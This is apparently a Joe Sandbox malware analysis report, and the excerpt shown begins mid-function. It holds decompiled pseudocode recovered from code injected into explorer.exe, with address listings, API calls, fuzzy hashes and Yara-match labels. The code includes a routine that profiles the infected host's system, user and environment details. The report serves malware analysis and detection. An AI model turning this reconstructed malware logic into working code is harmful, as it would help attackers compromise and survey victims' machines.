						_v12 = 0;
						_t48 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t52 = E00088604(_v16 + 1); // executed
						_t70 = _t52;
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x286fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}






















                            0x0008e2c6
                            0x0008e2d9
                            0x0008e2e0
                            0x0008e2e9
                            0x0008e2f1
                            0x0008e2f7
                            0x0008e2fc
                            0x0008e307
                            0x0008e30c
                            0x0008e3a5
                            0x0008e3a5
                            0x0008e3ad
                            0x00000000
                            0x0008e3b2
                            0x0008e313
                            0x0008e316
                            0x0008e31d
                            0x0008e32d
                            0x0008e333
                            0x0008e33e
                            0x0008e343
                            0x0008e348
                            0x0008e34d
                            0x0008e354
                            0x0008e358
                            0x0008e35f
                            0x0008e363
                            0x0008e367
                            0x0008e368
                            0x0008e36b
                            0x0008e370
                            0x0008e379
                            0x0008e385
                            0x0008e38f
                            0x0008e394
                            0x0008e394
                            0x0008e379
                            0x0008e39a
                            0x0008e39b
                            0x00000000
                            0x0008e3a4
                            0x00000000

                            APIs
                            • Sleep.KERNELBASE(0000000A), ref: 0008E394
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                            • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













                            0x0008a3ed
                            0x0008a3f6
                            0x0008a3f8
                            0x0008a3fa
                            0x0008a3fe
                            0x0008a400
                            0x0008a408
                            0x0008a40f
                            0x0008a418
                            0x0008a41d
                            0x0008a422
                            0x0008a446
                            0x0008a44b
                            0x0008a451
                            0x0008a45d
                            0x0008a462
                            0x0008a424
                            0x0008a42d
                            0x0008a443
                            0x00000000
                            0x0008a42f
                            0x0008a43b
                            0x0008a440
                            0x0008a42d
                            0x0008a422
                            0x0008a465
                            0x0008a466
                            0x0008a400
                            0x0008a470

                            APIs
                              • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                            • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                            • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x286f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                            0x00085d80
                            0x00085d95
                            0x00085d9e
                            0x00085da7
                            0x00085da9
                            0x00085db1
                            0x00085dc1
                            0x00085dcf
                            0x00085dd4
                            0x00085dd9
                            0x00085ddb
                            0x00085ddd
                            0x00085de2
                            0x00085de4
                            0x00085dff
                            0x00085dff
                            0x00085de6
                            0x00085de7
                            0x00085df2
                            0x00085dfa
                            0x00085dfc
                            0x00085dfc
                            0x00085de4
                            0x00085e01
                            0x00085db3
                            0x00085db4
                            0x00085db9
                            0x00085dbe
                            0x00085dbe
                            0x00085e05

                            APIs
                            • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                            • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x286fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x286f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                            0x0008ba0a
                            0x0008ba12
                            0x0008ba1a
                            0x0008ba1f
                            0x0008ba29
                            0x0008ba32
                            0x0008ba37
                            0x0008ba3c
                            0x0008ba5a
                            0x0008ba5d
                            0x0008ba3e
                            0x0008ba41
                            0x0008ba43
                            0x0008ba4b
                            0x0008ba4b
                            0x0008ba4e
                            0x0008ba4e
                            0x0008ba61
                            0x0008ba22
                            0x0008ba22
                            0x0008ba22

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                            • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











                            0x00085cec
                            0x00085cec
                            0x00085cef
                            0x00085cfe
                            0x00085d03
                            0x00085d08
                            0x00085d0f
                            0x00085d15
                            0x00085d1b
                            0x00085d21
                            0x00085d26
                            0x00085d2b
                            0x00085d33
                            0x00085d3d
                            0x00085d4b
                            0x00085d53
                            0x00085d5f
                            0x00085d67
                            0x00085d6c
                            0x00085d72
                            0x00085d7c

                            APIs
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                              • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                              • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                              • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                              • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                              • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            • memset.MSVCRT ref: 00085D5F
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                            • String ID:
                            • API String ID: 4245722550-0
                            • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                            • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






                            0x0008861d
                            0x00088622
                            0x00088668
                            0x00088668
                            0x00088625
                            0x00088629
                            0x0008862b
                            0x0008862e
                            0x00088634
                            0x00088642
                            0x00088646
                            0x00088646
                            0x00088636
                            0x00088637
                            0x0008863c
                            0x0008864f
                            0x00088660
                            0x00088660
                            0x00000000

                            APIs
                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                            • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                            0x0008a786
                            0x0008a787
                            0x0008a78c
                            0x0008a790
                            0x0008a79f
                            0x0008a7a7
                            0x0008a7b4
                            0x00000000
                            0x0008a7b7
                            0x0008a7ab
                            0x00000000
                            0x0008a7ab
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                            • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




                            0x000898aa
                            0x000898bc
                            0x000898ca
                            0x000898d7
                            0x000898da
                            0x000898e1
                            0x000898e1
                            0x00000000
                            0x000898e6
                            0x00000000

                            APIs
                            • CloseHandle.KERNELBASE(?), ref: 000898CA
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                            • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x286f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x286f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








                            0x0008b337
                            0x0008b33f
                            0x0008b344
                            0x0008b34a
                            0x0008b34e
                            0x0008b350
                            0x0008b355
                            0x0008b35e
                            0x0008b362
                            0x0008b362
                            0x0008b36a
                            0x00000000
                            0x0008b36d
                            0x0008b371

                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                            • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0x286f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0x286fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0x286fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x286f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x286f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x286f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x286f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x286f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x286f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































                            0x0008d01f
                            0x0008d029
                            0x0008d035
                            0x0008d03a
                            0x0008d03f
                            0x0008d3ff
                            0x0008d3ff
                            0x0008d04c
                            0x0008d052
                            0x0008d057
                            0x0008d05d
                            0x0008d06d
                            0x0008d079
                            0x0008d079
                            0x0008d082
                            0x0008d088
                            0x0008d08a
                            0x0008d093
                            0x0008d093
                            0x0008d09f
                            0x0008d0a3
                            0x0008d0a8
                            0x0008d0ae
                            0x0008d0b7
                            0x0008d0c5
                            0x0008d0cc
                            0x0008d0d1
                            0x0008d0d1
                            0x0008d0d2
                            0x0008d0b9
                            0x0008d0b9
                            0x0008d0b9
                            0x0008d0d8
                            0x0008d0e3
                            0x0008d0f1
                            0x0008d0f7
                            0x0008d0fb
                            0x0008d101
                            0x0008d108
